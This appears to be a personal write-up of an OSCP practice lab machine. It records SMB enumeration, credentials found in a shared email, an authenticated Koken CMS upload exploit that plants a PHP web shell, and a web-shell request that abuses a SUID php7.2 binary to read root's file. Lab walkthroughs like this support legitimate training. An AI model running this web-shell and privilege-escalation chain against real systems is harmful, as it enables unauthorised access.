I’ve started my OSCP journey a while ago, and I wanted to try the PG machines, this is the first one that I’ve tried. The machine is fairly straightforward and it’s labeled easy.
I’ve started with a simple
nmap scan, which hinted that this Linux machine is part of an Active Directory.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 414daa1886948e88a74c6b426076f14f (RSA) | 256 4da3d07a8f64ef82452d011318b7e013 (ECDSA) |_ 256 1a017a4fcf9585bf31a14f1587ab94e2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Photographer by v1n1v131r4 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: daisa ahomi |_http-generator: Koken 0.22.24 Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
On the port
80 we have a simple web page which is more or less just a placeholder of a template, but on the
8000 we have a functional website build with
# Versions for :80 http://192.168.160.76:80/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.160.76], JQuery, Script, Title[Photographer by v1n1v131r4] # Versions for :8000 http://192.168.160.76:8000/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.160.76], JQuery[1.12.4], Meta-Author[daisa ahomi], MetaGenerator[Koken 0.22.24], Script, Title[daisa ahomi], X-UA-Compatible[IE=edge]
I immediately searched for exploits for
Koken 0.22.24, and found this one: https://www.exploit-db.com/exploits/48706
authenticated exploit, so it hinted that I must look further to get some credentials.
Upon scanning the Active Directory (
139,445) I found public shares, one of which was non-default
$ smbclient -N -L 192.168.160.76 Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers sambashare Disk Samba on Ubuntu IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
I explored it and found 2 files, one was an email in a
txt format and the other one was zipped WordPress site, I’ve scanned the WordPress source code with
gf (https://github.com/tomnomnom/gf) but found nothing. The mail thought had an interesting text inside that hinted two users and suggestion for a password.
email@example.com - Agi Clarence firstname.lastname@example.org - Daisa Ahomi
I found the password for the user
email@example.com in the content of the mail. (It is very simple!)
After that, I logged into the
Koken's Admin Panel and uploaded a simple PHP shell using the previously mentioned exploit. I could read the
user/local.txt file that yielded the user own flag.
The root was pretty straightforward, upon scanning for
SUID binaries, I found that
/usr/bin/php7.2 was such, and a simple request with the previous active shell yielded me the root flag.
GET /storage/originals/4f/38/image.php?cmd=/usr/bin/php7.2+-r+'readfile("/root/proof.txt")%3b' HTTP/1.1 Host: 192.168.210.76:8000 Upgrade-Insecure-Requests: 1 User-Agent: ... Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: koken_session_ci=... Connection: close